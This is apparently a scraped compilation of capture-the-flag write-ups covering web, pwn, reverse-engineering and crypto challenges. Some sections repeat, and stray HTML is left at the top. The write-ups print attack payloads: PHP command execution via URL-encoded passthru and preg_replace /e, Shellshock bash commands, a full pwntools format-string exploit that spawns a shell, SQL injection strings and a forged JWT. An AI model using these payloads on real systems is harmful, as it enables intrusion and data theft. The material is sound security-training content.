1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# GET Encoded
We have this website that says `Machine hunts for more than humand do`, Nothing else. But the challenge's name is GET Encode, there must be something to do with the query parameters.

So I sent request to `/?aaa=bbb` and in the response I got error message that function `aaa` was undefined.
So then I tried printf function to check does it takes function arguments? So I sent the request `/?printf=test123` and it worked.
Then I tried using the `shellexec` function to execute code but it gave this error. After spending about 20 minutes on REQUEST_URI header, I could not find anything. I have also tried other functions like exec, passthru... file nothing workked. 
Then after URL encoding the parameter's name, I sent the request. So,* > `/?passthru=cat+index.php`

After URL ecoding
* > `/?%70%61%73%73%74%68%72%75=cat+index.php`

And it worked. I can execute any command like this so after executing `ls` command I found these files. There was robots.txt file too that I did not notice before!
After opening the robots.txt file I foudn that we can use `/?debug` query to get PHP source code!
Anyway, I used `cat` command to read the flag.php file. But it did not allow dots, so I had to URL encode the value as well.

> ### LLS{i_gotcha_url_encoding}
|
# Irregular Expression
This page contains form, we can send regex, text and string to replace. This replace function will be processed by backend `php`. and I remembered one CTF writeup, in which PHP's `preg_match` function was vulnerable to Remote Code Execution.
So in the regex, if we use `/e` modifier and the shell command we can get RCE!
So I submitted* pattern = /(.*)/e* replace = \`ls+-la\` * text = test

And found that that file contains the flag

> ### LLS{php_preg_replace_may_be_dangerous} |
# Crush
* The website was static! Tried getting information from robots.txt, sitemap but 404!* Then after reading source, I found this url http://jh2i.com:50020/cgi-bin/crush.sh `Dudes, woah! This is bash, duuuudddddeeeee.`* Then I have tried the SHELLSHOCK! and it worked! > ` () { :; }; echo; echo; /bin/bash -c 'ls -la'`

* Now we have the shell, we still need to find the flag. I have looked at Apache directories, Apache config files, CGI directory, but there was nothing. So I had to do this! > `() { :; }; echo; echo; /bin/bash -c 'grep -ir LS{ /'`

* And the flag was in the `home` directory!
> ### LLS{woah_dude_radical_shellshock} |
# pwn2(80pts) #

It was a really fun task , we had a format string vulnerability , so firstly i overwrited the GOT entry of the exit function with main address so we have now an infinite loop and the program will never exit , than using format string we leak the libc base address and than we overwrite the GOT entry of printf with the address of system :D Here is my exploit , if you have any questions you can contact me o twitter @BelkahlaAhmed1
```python
from pwn import *def extract(add,n): p1="0x"+add[-4:] p2=add[:6] if n==1: return p1 if n==2: return p2def pad(payload): return payload+"X"*(63-len(payload))#p=process("./pwn2")p=remote("pwn2-01.play.midnightsunctf.se",10002)p.recvuntil("input:")EXITGOT=p32(0x804b020)EXITGOT2=p32(0x804b020+2)'''s=""for i in range(27,34): s+="%"+str(i)+"$p "'''payload=EXITGOT+EXITGOT2payload+="%2044x%8$hn%32231x%7$hn"#raw_input("attach")p.sendline(pad(payload))p.recvuntil("input:")p.sendline(pad("%30$x"))data=p.recvuntil("X")printf=int("0x"+data[-9:-1],16)-5LIBCBASE=printf-0x50b60log.info("Leaked Libc Base : "+hex(LIBCBASE))p.recvuntil("input:")PRINTFGOT=p32(0x804b00c)PRINTFGOT2=p32(0x804b00c+2)SYSTEM=LIBCBASE+0x3cd10log.info("System address: "+hex(SYSTEM))payload=PRINTFGOTpayload+=PRINTFGOT2p1=int(extract(hex(SYSTEM),1),16)p2=int(extract(hex(SYSTEM),2),16)log.info("P1: "+str(p1-8)+" P2: "+str(p2-p1))payload+="%"+str(p1-8)+"x%7$hn%"+str(p2-p1)+"x%8$hn"log.info("Payload crafted")p.sendline(pad(payload))p.recvuntil("input:")p.sendline("/bin/sh")p.interactive()
#Main address 0x80485eb# 7 stack adress
``` |
# Avr-rev
Description: My Arduino now has internet access! :D Avr-rev consists out of a Intel HEX format AVR Binary and a service to connect to.The AVR program tries to parse the user input and gives out a number as response.
## Solution
Playing around with the online service reveals some interesting properties.
The parser supports numbers, strings, arrays and dictionaries in a limited fashion.Matching it up with the parser code in the binary shows that there isn't much more either.
When entering a dictionary the output not only doesn't fail to parse but also outputs a '1' instead of '0'.
```> {"test":1}{"test": 1}1```
Further playing around shows that entering a number as the dictionary key makes it output a '2'.
```> {1:2}{1: 2}2```
Diving into the code confirms this behaviour and shows that the next step is to set the key value to 1337 (which is the base10 version of 0x539).

```> {1337: 1}{1337: 1}3```
Setting the value to a string results in variating output depending on the characters entered:
```> {1337: "A"}{1337: "A"}251```
A look into the code shows that it takes each character from the string entered and subtracts them from a value read from an internal register.If the values match it continues with the next character, otherwise it outputs the difference and exits.

Using a small helper function and just entering A's as a start reveals the secret string by slowly matching it.
```pythondef delta(v): if v > 0x7f: return chr(ord("A")+(0xff-v+1)) return chr(ord("A")-v)```
```> {1337: "First: midnight{only31?} But AAA"}{1337: "First: midnight{only31?} But AAA"}205
> {1337: "First: midnight{only31?} But tAA"}{1337: "First: midnight{only31?} But tAA"}210
> {1337: "First: midnight{only31?} But toA"}{1337: "First: midnight{only31?} But toA"}33
> {1337: "First: midnight{only31?} But to "}{1337: "First: midnight{only31?} But to "}153``` # Pybonhash
Description: What's this newfangled secure hashing technique? Pybonhash consists out of pybonhash.cpython-36.pyc and hash.txt.When giving pybonhash an input file it "hashes" the content with the flag as key.The task is to derive the flag from the hash out of hash.txt.
## Solution
Decompiling the `pybonhash.cpython-36.pyc` file with uncompyle6 shows a relatively simple "hashing" algorithm.
```pythonimport string, sys, hashlib, binasciifrom Crypto.Cipher import AESfrom flag import keyif not len(key) == 42: raise AssertionErrordata = open(sys.argv[1], 'rb').read()if not len(data) >= 191: raise AssertionErrorFIBOFFSET = 4919MAXFIBSIZE = len(key) + len(data) + FIBOFFSET
def fibseq(n): out = [ 0, 1] for i in range(2, n): out += [out[i - 1] + out[i - 2]] return out
FIB = fibseq(MAXFIBSIZE)i = 0output = ''while i < len(data): data1 = data[FIB[i] % len(data)] key1 = key[(i + FIB[FIBOFFSET + i]) % len(key)] i += 1 data2 = data[FIB[i] % len(data)] key2 = key[(i + FIB[FIBOFFSET + i]) % len(key)] i += 1 tohash = bytes([data1, data2]) toencrypt = hashlib.md5(tohash).hexdigest() thiskey = bytes([key1, key2]) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.encrypt(toencrypt) output += binascii.hexlify(enc).decode('ascii')
print(output)```
Because characters are MD5 hashed in pairs of two and AES encrypted with only two characters of the key each iteration it's possible to reconstruct the key and parts of the input data based on the hash.
By first creating a lookup table for all md5 hashed data combinations:
```python# Build Lookup table for the hashed data pairsdef buildTable(): table = {} for data1 in range(0x100): for data2 in range(0x100): table[hashlib.md5(chr(data1)+chr(data2)).hexdigest()] = chr(data1)+chr(data2) return table```
And then for each block trying each possible key until a matching entry is found:
```python# Try all key combinations until a matching table entry was founddef tryKeys(table, data): for key1 in range(0x100): for key2 in range(0x100): thiskey = (chr(key1)+chr(key2)) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.decrypt(data.decode("hex")) if enc in table: return ((chr(key1)+chr(key2)), table[enc]) return None```
Each block can be individually decrypted, each time leaking parts of the key and data:
```pythondef decrypt(s): dataTable = buildTable() # create lookup table FIB = fibseq(MAXFIBSIZE) # create fib sequence like in the encoder i = 0 keyR = list(" "*key_len) # output key character list dataR = list(" "*data_len) # output data character list for j in range(len(s)/64): d1_i = FIB[i] % data_len # encoding index for the first data byte k1_i = (i + FIB[FIBOFFSET + i]) % key_len # encoding index for the first key byte i = i + 1 d2_i = FIB[i] % data_len # encoding index for the second data byte k2_i = (i + FIB[FIBOFFSET + i]) % key_len # encoding index for the second key byte i = i + 1 part = s[j*64:(j+1)*64] # extract the relevant 32 byte block from the hex encoded hash res = (tryKeys(dataTable, part)) # try all keys until a match is found, returns (key, data) pair keyR[k1_i] = res[0][0] # save all entries keyR[k2_i] = res[0][1] dataR[d1_i] = res[1][0] dataR[d2_i] = res[1][1] print(''.join(keyR)) # print progress return (''.join(keyR) , ''.join(dataR)) # return resulting key and data ```
Which in the end recovers the full "hashing key":
```midnight{xwJjPw4Vp0Zl19xIdaNuz6zTeMQ1wlNP}``` # Indian guessing
Description: Let's play an Indian guessing game! Indian guessing is a service which approximates floating points entered to it. ## Solution
Normal behavior:
```Let's play an Indian guessing game!> 133.71 I guess 500000.0 Too big!2 I guess 250000.0 Too big!3 I guess 125000.0 Too big!4 I guess 62500.0 Too big!5 I guess 31250.0 Too big!6 I guess 15625.0 Too big!7 I guess 7812.5 Too big!8 I guess 3906.25 Too big!9 I guess 1953.125 Too big!10 I guess 976.5625 Too big!11 I guess 488.28125 Too big!12 I guess 244.140625 Too big!13 I guess 122.0703125 Too small!14 I guess 183.10546875 Too big!15 I guess 152.587890625 Too big!16 I guess 137.3291015625 Too big!17 I guess 129.69970703125 Too small!18 I guess 133.514404296875 Too small!19 I guess 135.4217529296875 Too big!20 I guess 134.46807861328125 Too big!21 I guess 133.99124145507812 Too big!22 I guess 133.75282287597656 Too big!23 I guess 133.63361358642578 Too small!24 I guess 133.69321823120117 Too small!25 I guess 133.72302055358887 Too big!26 I guess 133.70811939239502 Too big!27 I guess 133.7006688117981 Close enough! ;) I got you this time!Let's play an Indian guessing game!```
Non number input:
```Let's play an Indian guessing game!> some_inputcould not convert string to float: 'some_input'```
A solution which is technically a float but can't be approximated:
```Let's play an Indian guessing game!> NaN1 I guess 500000.0 Too small!2 I guess 750000.0 Too small!3 I guess 875000.0 Too small!4 I guess 937500.0 Too small!5 I guess 968750.0 Too small!6 I guess 984375.0 Too small!7 I guess 992187.5 Too small!8 I guess 996093.75 Too small!9 I guess 998046.875 Too small!10 I guess 999023.4375 Too small!11 I guess 999511.71875 Too small!12 I guess 999755.859375 Too small!13 I guess 999877.9296875 Too small!14 I guess 999938.96484375 Too small!15 I guess 999969.482421875 Too small!16 I guess 999984.7412109375 Too small!17 I guess 999992.3706054688 Too small!18 I guess 999996.1853027344 Too small!19 I guess 999998.0926513672 Too small!20 I guess 999999.0463256836 Too small!21 I guess 999999.5231628418 Too small!22 I guess 999999.7615814209 Too small!23 I guess 999999.8807907104 Too small!24 I guess 999999.9403953552 Too small!25 I guess 999999.9701976776 Too small!26 I guess 999999.9850988388 Too small!27 I guess 999999.9925494194 Too small!28 I guess 999999.9962747097 Too small!29 I guess 999999.9981373549 Too small!30 I guess 999999.9990686774 Too small!You have beaten me. Here you go: midnight{rice_and_cu^H^Hsoju}``` |
# Magician
* In this challenge, We have to find the value so that its md5 hash is equal to `0e953532678923638053842468642408`* We can use magic hash, because the given hash is in the form of `/^0e\d*$/`
* PHP's == comparison, these types of string will be treated as float;
```php if ('0e111' == '0e222') { echo "True"; // Prints True! } else { echo "False"; } ```* So if we submit any magic hash, it will be accepted if the website uses `==` operator. * I have used `QLTHNDT`, its hash is `0e405967825401955372549139051580` > https://github.com/spaze/hashes/blob/master/md5.md
* After submitting it, I got the flag! > ### LLS{magic_hashes_make_for_a_good_show} |
For this challenge, we are given an image of Rick, from Rick and Morty, holding a gun being photoshopped onto an image from the video game, Fornite with a rift next to him.
The hint "wubba lubba dub dub" is a reference to a phrase said in Rick and Morty Season 1 Episode 11 meaning “I am in great pain, please help me”. This hint doesn't help us directly but they point towards us running the strings command on the image.
Command and Results: https://github.com/joeyjon123/riftCTF/blob/master/stegstrings1.txt
The flag is the very last output.
Flag: riftCTF{R1ck_4ND_the_r1ft} |
For this challenge, we are asked a simple question: "Slowloris DDoS targets which layer?"
Doing a quick google search on Slowloris DDos, we find that Cloudflare has a page on the topic.
Link: https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/
Result: Going through the page, we learn that Slowloris is an application layer attack.
Flag: riftCTF{Application} |
# ▼▼▼CREDITS(Web:50pts,538/661=81.4%)▼▼▼This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```POST /newcredit HTTP/1.1Host: credits.tamuctf.comContent-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: user_sid=s%3AEVaIDVeDv-lQu-r-3qLKKpCyqluQLM51.kOxuXpHYpX2KzfHOX4%2F5Na0NsPj9bbkVYkc6dTmCi7cConnection: close
increment=2000000000```
↓ Buy flag because money is increasing
`gigem{serverside_53rv3r5163_SerVeRSide}` |
## Full WriteUp
Full Writeup on our website: [https://www.aperikube.fr/docs/tamuctf_2020/652ahs/](https://www.aperikube.fr/docs/tamuctf_2020/652ahs/)
## TL;DR
The challenge was intended to be a timing side-channel attack but due to a bad implementation I was able to make the service crash when I guess an answer correctly, which allowed me to recover all the expected answers. |
# Avr-rev
Description: My Arduino now has internet access! :D Avr-rev consists out of a Intel HEX format AVR Binary and a service to connect to.The AVR program tries to parse the user input and gives out a number as response.
## Solution
Playing around with the online service reveals some interesting properties.
The parser supports numbers, strings, arrays and dictionaries in a limited fashion.Matching it up with the parser code in the binary shows that there isn't much more either.
When entering a dictionary the output not only doesn't fail to parse but also outputs a '1' instead of '0'.
```> {"test":1}{"test": 1}1```
Further playing around shows that entering a number as the dictionary key makes it output a '2'.
```> {1:2}{1: 2}2```
Diving into the code confirms this behaviour and shows that the next step is to set the key value to 1337 (which is the base10 version of 0x539).

```> {1337: 1}{1337: 1}3```
Setting the value to a string results in variating output depending on the characters entered:
```> {1337: "A"}{1337: "A"}251```
A look into the code shows that it takes each character from the string entered and subtracts them from a value read from an internal register.If the values match it continues with the next character, otherwise it outputs the difference and exits.

Using a small helper function and just entering A's as a start reveals the secret string by slowly matching it.
```pythondef delta(v): if v > 0x7f: return chr(ord("A")+(0xff-v+1)) return chr(ord("A")-v)```
```> {1337: "First: midnight{only31?} But AAA"}{1337: "First: midnight{only31?} But AAA"}205
> {1337: "First: midnight{only31?} But tAA"}{1337: "First: midnight{only31?} But tAA"}210
> {1337: "First: midnight{only31?} But toA"}{1337: "First: midnight{only31?} But toA"}33
> {1337: "First: midnight{only31?} But to "}{1337: "First: midnight{only31?} But to "}153``` # Pybonhash
Description: What's this newfangled secure hashing technique? Pybonhash consists out of pybonhash.cpython-36.pyc and hash.txt.When giving pybonhash an input file it "hashes" the content with the flag as key.The task is to derive the flag from the hash out of hash.txt.
## Solution
Decompiling the `pybonhash.cpython-36.pyc` file with uncompyle6 shows a relatively simple "hashing" algorithm.
```pythonimport string, sys, hashlib, binasciifrom Crypto.Cipher import AESfrom flag import keyif not len(key) == 42: raise AssertionErrordata = open(sys.argv[1], 'rb').read()if not len(data) >= 191: raise AssertionErrorFIBOFFSET = 4919MAXFIBSIZE = len(key) + len(data) + FIBOFFSET
def fibseq(n): out = [ 0, 1] for i in range(2, n): out += [out[i - 1] + out[i - 2]] return out
FIB = fibseq(MAXFIBSIZE)i = 0output = ''while i < len(data): data1 = data[FIB[i] % len(data)] key1 = key[(i + FIB[FIBOFFSET + i]) % len(key)] i += 1 data2 = data[FIB[i] % len(data)] key2 = key[(i + FIB[FIBOFFSET + i]) % len(key)] i += 1 tohash = bytes([data1, data2]) toencrypt = hashlib.md5(tohash).hexdigest() thiskey = bytes([key1, key2]) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.encrypt(toencrypt) output += binascii.hexlify(enc).decode('ascii')
print(output)```
Because characters are MD5 hashed in pairs of two and AES encrypted with only two characters of the key each iteration it's possible to reconstruct the key and parts of the input data based on the hash.
By first creating a lookup table for all md5 hashed data combinations:
```python# Build Lookup table for the hashed data pairsdef buildTable(): table = {} for data1 in range(0x100): for data2 in range(0x100): table[hashlib.md5(chr(data1)+chr(data2)).hexdigest()] = chr(data1)+chr(data2) return table```
And then for each block trying each possible key until a matching entry is found:
```python# Try all key combinations until a matching table entry was founddef tryKeys(table, data): for key1 in range(0x100): for key2 in range(0x100): thiskey = (chr(key1)+chr(key2)) * 16 cipher = AES.new(thiskey, AES.MODE_ECB) enc = cipher.decrypt(data.decode("hex")) if enc in table: return ((chr(key1)+chr(key2)), table[enc]) return None```
Each block can be individually decrypted, each time leaking parts of the key and data:
```pythondef decrypt(s): dataTable = buildTable() # create lookup table FIB = fibseq(MAXFIBSIZE) # create fib sequence like in the encoder i = 0 keyR = list(" "*key_len) # output key character list dataR = list(" "*data_len) # output data character list for j in range(len(s)/64): d1_i = FIB[i] % data_len # encoding index for the first data byte k1_i = (i + FIB[FIBOFFSET + i]) % key_len # encoding index for the first key byte i = i + 1 d2_i = FIB[i] % data_len # encoding index for the second data byte k2_i = (i + FIB[FIBOFFSET + i]) % key_len # encoding index for the second key byte i = i + 1 part = s[j*64:(j+1)*64] # extract the relevant 32 byte block from the hex encoded hash res = (tryKeys(dataTable, part)) # try all keys until a match is found, returns (key, data) pair keyR[k1_i] = res[0][0] # save all entries keyR[k2_i] = res[0][1] dataR[d1_i] = res[1][0] dataR[d2_i] = res[1][1] print(''.join(keyR)) # print progress return (''.join(keyR) , ''.join(dataR)) # return resulting key and data ```
Which in the end recovers the full "hashing key":
```midnight{xwJjPw4Vp0Zl19xIdaNuz6zTeMQ1wlNP}``` # Indian guessing
Description: Let's play an Indian guessing game! Indian guessing is a service which approximates floating points entered to it. ## Solution
Normal behavior:
```Let's play an Indian guessing game!> 133.71 I guess 500000.0 Too big!2 I guess 250000.0 Too big!3 I guess 125000.0 Too big!4 I guess 62500.0 Too big!5 I guess 31250.0 Too big!6 I guess 15625.0 Too big!7 I guess 7812.5 Too big!8 I guess 3906.25 Too big!9 I guess 1953.125 Too big!10 I guess 976.5625 Too big!11 I guess 488.28125 Too big!12 I guess 244.140625 Too big!13 I guess 122.0703125 Too small!14 I guess 183.10546875 Too big!15 I guess 152.587890625 Too big!16 I guess 137.3291015625 Too big!17 I guess 129.69970703125 Too small!18 I guess 133.514404296875 Too small!19 I guess 135.4217529296875 Too big!20 I guess 134.46807861328125 Too big!21 I guess 133.99124145507812 Too big!22 I guess 133.75282287597656 Too big!23 I guess 133.63361358642578 Too small!24 I guess 133.69321823120117 Too small!25 I guess 133.72302055358887 Too big!26 I guess 133.70811939239502 Too big!27 I guess 133.7006688117981 Close enough! ;) I got you this time!Let's play an Indian guessing game!```
Non number input:
```Let's play an Indian guessing game!> some_inputcould not convert string to float: 'some_input'```
A solution which is technically a float but can't be approximated:
```Let's play an Indian guessing game!> NaN1 I guess 500000.0 Too small!2 I guess 750000.0 Too small!3 I guess 875000.0 Too small!4 I guess 937500.0 Too small!5 I guess 968750.0 Too small!6 I guess 984375.0 Too small!7 I guess 992187.5 Too small!8 I guess 996093.75 Too small!9 I guess 998046.875 Too small!10 I guess 999023.4375 Too small!11 I guess 999511.71875 Too small!12 I guess 999755.859375 Too small!13 I guess 999877.9296875 Too small!14 I guess 999938.96484375 Too small!15 I guess 999969.482421875 Too small!16 I guess 999984.7412109375 Too small!17 I guess 999992.3706054688 Too small!18 I guess 999996.1853027344 Too small!19 I guess 999998.0926513672 Too small!20 I guess 999999.0463256836 Too small!21 I guess 999999.5231628418 Too small!22 I guess 999999.7615814209 Too small!23 I guess 999999.8807907104 Too small!24 I guess 999999.9403953552 Too small!25 I guess 999999.9701976776 Too small!26 I guess 999999.9850988388 Too small!27 I guess 999999.9925494194 Too small!28 I guess 999999.9962747097 Too small!29 I guess 999999.9981373549 Too small!30 I guess 999999.9990686774 Too small!You have beaten me. Here you go: midnight{rice_and_cu^H^Hsoju}``` |
# picoCTF 2019 Web Challenges
---
## Inspector(50)
### Problem
> Kishor Balan tipped us off that the following code may need inspection: `https://2019shell1.picoctf.com/problem/61676/` ([link](https://2019shell1.picoctf.com/problem/61676/)) or http://2019shell1.picoctf.com:61676
### Hints
> How do you inspect web code on a browser?>> There's 3 parts
### Solution
Visiting the website, we right click and choose to view source code, getting the first third of the flag, included as a html comment:
```html
```
The second part of the flag comes from the referenced CSS file [mycss.cs](https://2019shell1.picoctf.com/problem/61676/mycss.css):
```CSS/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */```
The last part comes from the Javascript scipt [myjs.js](https://2019shell1.picoctf.com/problem/61676/myjs.js):
```javascript/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?1638dbe7} */```
Hence combining the 3 parts gives the flag:
`picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?1638dbe7}`
## dont-use-client-side(100)
### Problem
> Can you break into this super secure portal? `https://2019shell1.picoctf.com/problem/49886/` ([link](https://2019shell1.picoctf.com/problem/49886/)) or http://2019shell1.picoctf.com:49886
### Hints
> Never trust the client
### Solution
Opening the website greets us with a 'login' page, requiring credentials. As referenced by the problem name, we assume that the check for the validity of the credentials is checked locally, and hence can be reversed to obtain the correct password. Checking the html source code gives us:
```html<script type="text/javascript"> function verify() { checkpass = document.getElementById("pass").value; split = 4; if (checkpass.substring(0, split) == 'pico') { if (checkpass.substring(split*6, split*7) == 'e2f2') { if (checkpass.substring(split, split*2) == 'CTF{') { if (checkpass.substring(split*4, split*5) == 'ts_p') { if (checkpass.substring(split*3, split*4) == 'lien') { if (checkpass.substring(split*5, split*6) == 'lz_e') { if (checkpass.substring(split*2, split*3) == 'no_c') { if (checkpass.substring(split*7, split*8) == '4}') { alert("Password Verified") } } } } } } } } else { alert("Incorrect password"); } }</script>```
The checkpass variable holds our input, and the each substring method in this case gets us *split*(set to 4) number of characters starting from the first argument to the method. We assemble the credentials, and hence the flag, accordingly:
`picoCTF{no_clients_plz_ee2f24}`
## logon(100)
### Problem
> The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? `https://2019shell1.picoctf.com/problem/32270/` ([link](https://2019shell1.picoctf.com/problem/32270/)) or http://2019shell1.picoctf.com:32270
### Hints
> Hmm it doesn't seem to check anyone's password, except for {{name}}'s?
### Solution
No matter what credentials we use for the login, it successfully logs us in but doesn't give us the flag. This suggests that a cookie might be used to store a separate variable that might be preventing us from seeing the flag. Sure enough, we notice an admin cookie set to `False`. Changing this to `True` and refreshing the page gives us the flag:
`picoCTF{th3_c0nsp1r4cy_l1v3s_a03e3590}`
## where are the robots(100)
### Problem
> Can you find the robots? `https://2019shell1.picoctf.com/problem/21868/` ([link](https://2019shell1.picoctf.com/problem/21868/)) or http://2019shell1.picoctf.com:21868
### Hints
> What part of the website could tell you where the creator doesn't want you to look?
### Solution
This challenge references [a file that gives instructions to web crawlers](https://www.robotstxt.org/robotstxt.html), called robots.txt. Visiting https://2019shell1.picoctf.com/problem/21868/robots.txt, we see
```htmlUser-agent: *Disallow: /e0779.html```
Visiting https://2019shell1.picoctf.com/problem/21868/e0779.html now, we get our flag:
`picoCTF{ca1cu1at1ng_Mach1n3s_e0779}`
## Client-side-again(200)
### Problem
> Can you break into this super secure portal? `https://2019shell1.picoctf.com/problem/37886/` ([link](https://2019shell1.picoctf.com/problem/37886/)) or http://2019shell1.picoctf.com:37886
### Hints
> What is obfuscation?
### Solution
Visiting the website, we are greeted by a page similar to [dont-use-client-side](#dont-use-client-side100). We thus check the source code of the website again, getting an obfuscation Javascript script:
```html<script type="text/javascript"> var _0x5a46=['9d025}','_again_3','this','Password\x20Verified','Incorrect\x20password','getElementById','value','substring','picoCTF{','not_this'];(function(_0x4bd822,_0x2bd6f7){var _0xb4bdb3=function(_0x1d68f6){while(--_0x1d68f6){_0x4bd822['push'](_0x4bd822['shift']());}};_0xb4bdb3(++_0x2bd6f7);}(_0x5a46,0x1b3));var _0x4b5b=function(_0x2d8f05,_0x4b81bb){_0x2d8f05=_0x2d8f05-0x0;var _0x4d74cb=_0x5a46[_0x2d8f05];return _0x4d74cb;};function verify(){checkpass=document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];split=0x4;if(checkpass[_0x4b5b('0x2')](0x0,split*0x2)==_0x4b5b('0x3')){if(checkpass[_0x4b5b('0x2')](0x7,0x9)=='{n'){if(checkpass[_0x4b5b('0x2')](split*0x2,split*0x2*0x2)==_0x4b5b('0x4')){if(checkpass[_0x4b5b('0x2')](0x3,0x6)=='oCT'){if(checkpass[_0x4b5b('0x2')](split*0x3*0x2,split*0x4*0x2)==_0x4b5b('0x5')){if(checkpass['substring'](0x6,0xb)=='F{not'){if(checkpass[_0x4b5b('0x2')](split*0x2*0x2,split*0x3*0x2)==_0x4b5b('0x6')){if(checkpass[_0x4b5b('0x2')](0xc,0x10)==_0x4b5b('0x7')){alert(_0x4b5b('0x8'));}}}}}}}}else{alert(_0x4b5b('0x9'));}}</script>```
We however, notice the array at the very start, containg a few strings, including some that might be a part of the flag, such as `'picoCTF'` and `'not_this'`. Excluding the error.success/html strings, we are left with `'picoCTF{'`, `'not_this'`, `'_again_3'`, and `'9d025}'`. We try assembling these pieces, we get the flag.
`picoCTF{not_this_again_39d025}`
## Open-to-admins(200)
### Problem
> This secure website allows users to access the flag only if they are **admin** and if the **time** is exactly 1400. `https://2019shell1.picoctf.com/problem/21882/` ([link](https://2019shell1.picoctf.com/problem/21882/)) or http://2019shell1.picoctf.com:21882
### Hints
> Can cookies help you to get the flag?
Visiting the website and clicking `Flag` tells us that we are not the admin, or it;s the incorrect time. From the challenge prompt, we know we need to be admin, and the time needs to be 1400. As hinted, we make a cookie named `Admin` with the value `True`, as seen in [logon](#logon100), and make a `Time` cookie with the value `1400`. Now clicking `Flag` gives us the flag:
`picoCTF{0p3n_t0_adm1n5_b6ea8359}`
## picobrowser(200)
### Problem
> This website can be rendered only by **picobrowser**, go and catch the flag! `https://2019shell1.picoctf.com/problem/37829/` ([link](https://2019shell1.picoctf.com/problem/37829/)) or http://2019shell1.picoctf.com:37829
### Hints
> You dont need to download a new web browser
### Solution
Clicking `Flag` tells us that we are not picobrowser, and then gives us our current [user agent](https://www.wikiwand.com/en/User_agent):

We can use an extension such as [User-Agent Switcher](https://chrome.google.com/webstore/detail/user-agent-switcher/lkmofgnohbedopheiphabfhfjgkhfcgf) on Google Chrome, to manually input our desired user agent. We use picobrowser as suggested and get the flag:
`picoCTF{p1c0_s3cr3t_ag3nt_7e9c671a}`
## Irish-Name-Repo 1(300)
### Problem
> There is a website running at `https://2019shell1.picoctf.com/problem/47253/` ([link](https://2019shell1.picoctf.com/problem/47253/)) or http://2019shell1.picoctf.com:47253. Do you think you can log us in? Try to see if you can login!
### Hints
> There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?>> Try to think about how does the website verify your login?
### Solution
The hint seems to suggest the use of [SQL injection](https://www.owasp.org/index.php/SQL_Injection), hence we start off by trying simple payloads:
```username: admin' --password: password(this field does not matter as it is commented out)```
This gives us the flag:
`picoCTF{s0m3_SQL_93e76603}`
## Irish-Name-Repo 2(350)
### Problem
> There is a website running at `https://2019shell1.picoctf.com/problem/60775/` ([link](https://2019shell1.picoctf.com/problem/60775/)). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:60775
### Hints
> The password is being filtered.
We start off by trying the same input as [Irish Name Repo 1](#irish-name-repo-1300):
```username: admin' --password: password(this field does not matter as it is commented out)```
This surprisingly gives us the flag as well!
`picoCTF{m0R3_SQL_plz_015815e2}`
With the hint to this challenge, I assume that Repo 1 was meant to be solved with an OR injection or something of the *like*.
## Irish-Name-Repo 3(400)
### Problem
> There is a secure website running at `https://2019shell1.picoctf.com/problem/47247/` ([link](https://2019shell1.picoctf.com/problem/47247/)) or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!
### Hints
> Seems like the password is encrypted.
Since the password is hinted to be encrypted, we first check the page source for any signs of encryption to the input, however, do not see any. This means the encryption must be taking place server side.
We want to leak the encryption method somehow, so we open [BurpSuite](https://portswigger.net/burp/communitydownload) to monitor the requests made to the site. We input some string(i.e. `abcdefghijklmnopqrstuvwxyz`) and submit the request. In BurpSuite, we notice a `debug` parameter, originally set to `0`.

We change this to a `1`, and forward the request. Now in addition to the `Login failed` page, we get some debug info:

The 'encryption' method used is just [ROT13](https://www.wikiwand.com/en/ROT13)! We can thus craft our payloads normally, just running it through a ROT13 converter before sending it through.
We utilise a simple payload that escapes the string and always evaluates to true:
`' OR 1=1 --`
'Encrypting' it, we get:
`' BE 1=1 --`
Submitting this as the input, we get our flag:
`picoCTF{3v3n_m0r3_SQL_c2c37f5e}`
## Empire 1(400)
### Problem
> Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. `https://2019shell1.picoctf.com/problem/4155/` ([link](https://2019shell1.picoctf.com/problem/4155/)) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:4155
### Hints
> Pay attention to the feedback you get>> There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.>> The database gets reverted every 2 hours if you do break it, just come back later
### Solution
*TODO*
## JaWT Scratchpad(400)
### Problem
> Check the admin scratchpad! `https://2019shell1.picoctf.com/problem/45158/` or http://2019shell1.picoctf.com:45158
### Hints
> What is that cookie?>> Have you heard of JWT?
We first enter the website with some username, and notice that we have been issued a `jwt` cookie. This is a [JSON Web Token](https://jwt.io/introduction/). We can also [decode](https://jwt.io/#debugger) our token, where we see the payload to be:
```javascript{ "user": "john"}```
We would obviously like to change the user to admin, however, to encode this, require the secret key. Under the section `Register with your name!`, a hyperlink linking to the JohnTheRipper tool's GitHub page suggests a brute force method is required. Instead of using JohnTheRipper, I chose to use this [jwt-cracker](https://github.com/lmammino/jwt-cracker). Letting it run for a while, I get the secret, `ilovepico`. Using the debugger tool on [jwt.io](jwt.io), we get the cookie to be injected:
`eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.gtqDl4jVDvNbEe_JYEZTN19Vx6X9NNZtRVbKPBkhO-s`
Injecting this as the cookie and refreshing the page gives us the flag:
`picoCTF{jawt_was_just_what_you_thought_d571d8aa3163f61c144f6d505ef2919b}`
## Java Script Kiddie(400)
### Problem
